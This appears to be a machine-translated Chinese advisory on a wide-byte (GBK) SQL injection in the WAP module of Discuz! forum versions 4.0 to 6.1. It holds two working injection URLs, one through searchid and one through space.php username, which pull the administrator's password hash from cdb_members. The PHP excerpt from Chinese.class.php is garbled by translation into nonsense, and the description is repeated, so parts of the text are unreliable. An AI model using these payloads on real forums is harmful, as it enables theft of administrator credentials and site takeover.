Discuz！WAP功能模块对注入孔进行编码

评论：影响版本：
Discuz！4.0.0
Discuz！4.1.0
Discuz！5.0.0
Discuz！5.5.0
Discuz！6.0.0
Discuz！6.1.0
描述：
Discuz！论坛系统是一种高效论坛解决方案与各种数据库，如PHP和MySQL建立。Discuz！代码质量、运行效率、负载能力、安全等级、功能可操作性和权限松紧性

冲版：
Discuz！4.0.0
Discuz！4.1.0
Discuz！5.0.0
Discuz！5.5.0
Discuz！6.0.0
Discuz！6.1.0
描述：
Discuz！论坛系统是一种高效论坛解决方案与各种数据库，如PHP和MySQL建立。Discuz！它在用户的代码质量、运行效率、负载能力、安全级别、功能可控性和权限松紧等方面都有良好的声誉。
由于多字节字符集的PHP支持的问题，就有可能造成程序溢出和各种编码转换过程中的错误处理程序。
提交一个'
变成'
然后它变成了GBK，和'和'将成为两个字符。
可以成功地引入
试验方法：
下列程序（方法）可能是攻击性的，仅用于安全研究和教学。

复制代码代码如下所示：
如果（定义（'in_discuz '））{
退出（'access否认）；
}
定义（'codetable_dir '，discuz_root。。 / / /包括表）；
类中国{
var =；
VaR iconv_enabled美元= false；
VaR unicode_table美元=阵（）；
数组
（
sourcelang= >，
targetlang= >，
gbtounicode_table= > 'gb-unicode表，
big5tounicode_table= > 'big5-unicode表，
）；
中国（sourcelang功能targetlang美元，美元，美元forcetable = false）{
美元->配置{ 'sourcelang} =美元-> _lang（$ sourcelang）；
美元->配置{ 'targetlang} =美元-> _lang（$ targetlang）；
如果（！function_exists（rsquo；iconvrsquo；））美元->配置{ 'targetlang}！= big5prime &lsquo；！forcetable美元）{ $ forcetable）{ '
美元-> iconv_enabled =真；
{人}
美元-> iconv_enabled = false；
美元-> OpenTable（）；
}
}
功能_lang（合LangCode）{
langcode = strtoupper美元（美元langcode）；
如果（substr（LangCode，0, 2）= = { &lsquo；GBrsquo；）
返回&lsquo；GBKrsquo；；
} elseif（substr（LangCode，0, 3）= = { &lsquo；BIGrsquo；）
返回big5prime &lsquo；；
} elseif（substr（LangCode，0, 3）= = { &lsquo；UTFrsquo；）
返回utf-8prime &lsquo；；
} elseif（substr（LangCode，0, 3）= = { &lsquo；unirsquo；）
返回unicodersquo &lsquo；；
}
}
功能_hex2bin（$ hexdata）{
为（$我= 0；$我< strlen（$ hexdata）；$我= 2）{
bindata美元= CHR（hexdec（substr（hexdata美元美元，我，2）））；
}
返回的bindata；
}

Chinese.class.php（UTF-8无法使用）
searchid = 22% cf'union选择1，密码3，密码 / / / * * / cdb_members / * / / / *在UID = 1 / *做=提交
/空间。phpusername = % % % % 20union CF的20select 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48，密码，50,51,52,53,54,55,56,57，数据库（59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84 % % % % 20from 20cdb_members 20where 20uid = 1 / *）。
直接在URL后面，您可以破坏id = 1的用户密码，并且您可以根据您的需要更改它。有一点需要注意的是，目标必须打开WAP，并且没有补丁，WAP浏览。

免责声明：本网信息来自于互联网，目的在于传递更多信息，并不代表本网赞同其观点。其原创性以及文中陈述文字和内容未经本站证实，对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺，并请自行核实相关内容。本站不承担此类作品侵权行为的直接责任及连带责任。如若本网有任何内容侵犯您的权益，请及时联系我们，本站将会在24小时内处理完毕。